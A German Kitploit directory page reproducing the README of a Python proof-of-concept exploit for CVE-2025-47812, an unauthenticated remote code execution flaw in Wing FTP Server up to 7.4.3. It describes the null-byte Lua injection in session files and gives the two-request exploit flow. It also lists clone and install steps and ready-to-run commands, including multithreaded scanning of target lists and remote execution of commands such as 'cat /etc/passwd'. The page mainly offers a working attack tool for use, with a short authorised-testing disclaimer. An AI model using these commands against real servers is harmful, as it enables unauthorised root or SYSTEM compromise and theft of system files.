Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-471812-POC — Python-PoC für CVE-2025-47812, nicht authentifizierte RCE in Wing FTP Server <= 7.4.3 über Nullbyte-Lua-Injection in Sitzungsdateien | Kitploit
Tools/GitHubGitHub/d3vn0mi/cve-2025-471812-poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubd3vn0mi/cve-2025-471812-poc

CVE-2025-471812-POC

Python-PoC für CVE-2025-47812, nicht authentifizierte RCE in Wing FTP Server <= 7.4.3 über Nullbyte-Lua-Injection in Sitzungsdateien

Repository anzeigen
1vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

root@kitploit:~
/ __ \|__  /  | / / | / / __ \/  |/  //  _/

/ / / / /_ <| | / /| |/ / / / / /|/ / / / / // // /| |/ / | / // / / / /_/ / /// |/ |/ ___// //____/

CVE-2025-47812 — Wing FTP Server <= 7.4.3 Nicht authentifizierte RCE

Proof-of-concept-Exploit für CVE-2025-47812, eine nicht authentifizierte Remote-Codeausführungsschwachstelle in Wing FTP Server-Versionen vor 7.4.4.

Schwachstellenübersicht

FeldDetails
CVECVE-2025-47812
BetroffenWing FTP Server <= 7.4.3
TypNicht authentifizierte Remote-Codeausführung
Berechtigungenroot (Linux) / SYSTEM (Windows)
Anbieterwftpserver.com
Ursprünglicher AutorSheikh Mohammad Hasan alias 4m3rr0r
Geändert vond3vn0mi

Grundursache

Die Funktion c_CheckUser() des Wing FTP Servers kürzt den Benutzernamen für Authentifizierungszwecke an einem NULL-Byte (%00) ab, aber der vollständige, nicht bereinigte Benutzername — einschließlich allem nach dem NULL-Byte — wird in eine Lua-Sitzungsdatei geschrieben. Wenn ein authentifizierter Endpunkt wie /dir.html aufgerufen wird, führt der Server diese Sitzungsdatei aus und löst den injizierten Lua-Code mit erhöhten Berechtigungen aus.

Ablauf des Exploits

root@kitploit:~
1. POST /loginok.html
   username=anonymous%00]]<LUA_PAYLOAD>&password=

2. Server authenticates "anonymous" (truncated at NULL)
   but writes full payload into session file → returns UID cookie

3. GET /dir.html  (Cookie: UID=<extracted_uid>)
   Server loads session file → executes injected Lua → RCE

Installation

root@kitploit:~
git clone https://github.com/d3vn0mi/cve_2025_471812_poc.git
cd cve_2025_471812_poc
pip install requests

Verwendung

Schneller Schwachstellencheck

root@kitploit:~
python3 exploit.py -u http://TARGET

Befehl ausführen

root@kitploit:~
python3 exploit.py -u http://TARGET -c 'id'

Mehrere Ziele aus einer Datei scannen

root@kitploit:~
python3 exploit.py -f targets.txt -o vulnerable.txt -t 8

Alle Optionen

root@kitploit:~
usage: exploit.py [-h] [-u URL] [-f FILE] [-c COMMAND] [-U USERNAME]
                  [-P PASSWORD] [-v] [-o OUTPUT] [-l LOG_FILE]
                  [-t THREADS] [--timeout TIMEOUT] [--retries RETRIES]
                  [--no-verify]

target:
  -u, --url URL           Single target URL (e.g. http://192.168.134.130)
  -f, --file FILE         File containing target URLs (one per line, # comments allowed)

exploit options:
  -c, --command COMMAND   Command to execute on the remote server (enables verbose output)
  -U, --username USERNAME Username for the exploit payload (default: anonymous)
  -P, --password PASSWORD Password for the exploit payload (default: empty)

output:
  -v, --verbose           Enable verbose / debug logging
  -o, --output OUTPUT     Save vulnerable URLs to this file
  -l, --log-file LOG_FILE Write detailed log to this file

network:
  -t, --threads THREADS   Concurrent threads for multi-target scans (default: 1)
  --timeout TIMEOUT       HTTP request timeout in seconds (default: 15)
  --retries RETRIES       Number of retries on connection failure (default: 2)
  --no-verify             Disable SSL certificate verification

Beispiele

root@kitploit:~
# Check a single target
python3 exploit.py -u http://192.168.1.10

# Run 'whoami' and see full output
python3 exploit.py -u http://192.168.1.10 -c 'whoami'

# Scan a list with 8 threads, log everything to a file
python3 exploit.py -f targets.txt -t 8 -l scan.log -o vuln.txt

# Use custom credentials with SSL verification disabled
python3 exploit.py -u https://10.0.0.5 -U admin -P secret -c 'cat /etc/passwd' --no-verify

# Verbose mode for debugging
python3 exploit.py -u http://192.168.1.10 -v

Funktionen

  • Strukturierte Protokollierung — Farbcodierte Konsolenausgabe (DEBUG/INFO/WARN/ERROR) + optionale Dateiprotokollierung über --log-file
  • Multithread-Scanning — Paralleles Scannen von Zielen mit -t für große Ziellisten
  • Wiederholung mit Backoff — Automatischer exponentieller Backoff bei Netzwerkfehlern (konfigurierbar über --retries)
  • SSL-Flexibilität — --no-verify für selbstsignierte Zertifikate
  • Batch-Scanning — Zieldateien unterstützen #-Kommentare und automatische Deduplizierung
  • Saubere Ausgabe — Der Schwachstellencheck-Modus liefert ein einfaches Ergebnis VULNERABLE/NOT VULNERABLE; -c zeigt die vollständige Befehlsausgabe

Haftungsausschluss

Dieses Tool dient nur der autorisierten Sicherheitsprüfung und Bildungszwecken. Verwenden Sie es ausschließlich gegen Systeme, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen besitzen. Unautorisierter Zugriff auf Computersysteme ist illegal. Die Autoren übernehmen keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.

Danksagungen

  • Ursprünglicher Exploit von 4m3rr0r
  • Modifiziert und verbessert von d3vn0mi
Tool herunterladen